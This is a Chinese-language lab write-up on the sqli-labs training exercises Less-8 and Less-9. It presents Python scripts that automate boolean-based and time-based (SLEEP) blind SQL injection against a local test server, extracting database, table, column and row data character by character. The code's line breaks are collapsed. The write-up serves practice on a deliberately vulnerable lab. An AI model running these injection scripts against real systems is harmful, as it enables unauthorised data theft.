實驗環境：

? ? ? ? sqli-labs，小皮面板搭建，edge瀏覽器

? ? ? ? apache：2.4.39，MySQL：5.7 PHP：5.39

? ? ? ? Python（pycharm2023）:3

less-8

布爾盲注：

???????1.我這里是采用最簡單的直接采用一串字符串來查詢的

import requestsurl = "http://localhost:8080/Less-8/"
param = "id"def getdatabase(url, param):database = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = f"{param}=1' AND SUBSTRING((SELECT database()), {i}, 1) = '{char}' -- "response = requests.get(url + "?" + payload)if "You are in..........." in response.text:database += charbreakelse:breakreturn database# 獲取表名
def gettable(url, param, database):tables = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = (f"{param}=1' AND SUBSTRING((SELECT GROUP_CONCAT(table_name) "f"FROM information_schema.tables "f"WHERE table_schema = '{database}'), {i}, 1) = '{char}' -- ")response = requests.get(url + "?" + payload)if "You are in..........." in response.text:tables += charbreakelse:breakreturn tables.split(',')# 獲取列名
def getcolumn(url, param, database, table):columns = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = (f"{param}=1' AND SUBSTRING((SELECT GROUP_CONCAT(column_name) "f"FROM information_schema.columns WHERE table_schema = '{database}' "f"AND table_name = '{table}'), {i}, 1) = '{char}' -- ")response = requests.get(url + "?" + payload)if "You are in..........." in response.text:columns += charbreakelse:breakreturn columns.split(',')# 獲取結果
def getresult(url, param, database, table, column):result = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = (f"{param}=1' AND SUBSTRING((SELECT {column} "f"FROM {database}.{table} LIMIT 1), {i}, 1) = '{char}' -- ")response = requests.get(url + "?" + payload)if "You are in..........." in response.text:result += charbreakelse:breakreturn resultif __name__ == "__main__":database = getdatabase(url, param)print(f"Database: {database}")tables = gettable(url, param, database)print(f"Tables: {tables}")table = tables[0]columns = getcolumn(url, param, database, table)print(f"Columns: {columns}")column = columns[0]result = getresult(url, param, database, table, column)print(f"Result: {result}")

tips：我這里沒有考慮有多個表和字段的情況，只是簡單的把布爾盲注的原理展示了出來、

時間盲注

less-9

時間盲注:

? ? ? ? 采用時間函數，判斷每個字段是否有時間差值（sleep函數）

import requests
import timedef time_based_blind_injection(url, param, payload):start_time = time.time()full_url = f"{url}?{param}={payload}"response = requests.get(full_url)end_time = time.time()if end_time - start_time > 5:return Truereturn Falsedef get_database(url, param):database = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = f"1' AND IF(SUBSTRING((SELECT database()), {i}, 1) = '{char}', SLEEP(7), 0) -- "if time_based_blind_injection(url, param, payload):database += charprint(char)breakelse:breakprint(f"[+] Database name: {database}")return database# 獲取表名
def get_table(url, param, database):table = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = (f"1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables "f"WHERE table_schema='{database}' LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- ")if time_based_blind_injection(url, param, payload):table += charprint(f"[+] Found character: {char}")breakelse:breakprint(f"[+] Table name: {table}")return table
# def get_tables(url, param, database):當表不止一個
#     tables = []
#     chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
#     table_count = 1  # 從第一個表開始
#     while True:
#         table_name = ""
#         for i in range(1, 20):
#             for char in chars:
#                 payload = (f"1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables "
#                            f"WHERE table_schema='{database}' LIMIT {table_count - 1},1), {i}, 1) = '{char}', SLEEP(5), 0) -- ")
#                 if time_based_blind_injection(url, param, payload):
#                     table_name += char
#                     print(f"[+] table: {char}")
#                     break
#             else:
#                 break
#         if table_name:
#             print(f"[+] Found table: {table_name}")
#             tables.append(table_name)
#             table_count += 1
#         else:
#             break
#
#     return tables# 獲取字段名
def get_column(url, param, table):column = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = f"1' AND IF(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='{table}' LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- "if time_based_blind_injection(url, param, payload):column += charprint(f"[+] column: {char}")breakelse:breakprint(f"[+] Column name: {column}")return columndef get_data(url, param, table, column):data = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = f"1' AND IF(SUBSTRING((SELECT {column} FROM {table} LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- "if time_based_blind_injection(url, param, payload):data += charprint(f"[+] Found character: {char}")breakelse:breakprint(f"[+] Data: {data}")return data# 主函數
if __name__ == "__main__":target_url = "http://localhost:8080/Less-9/"param = "id"database = get_database(target_url, param)if database:table = get_table(target_url, param, database)if table:column = get_column(target_url, param, table)if column:get_data(target_url, param, table, column)

同樣沒有考慮不止一個表或者列的情況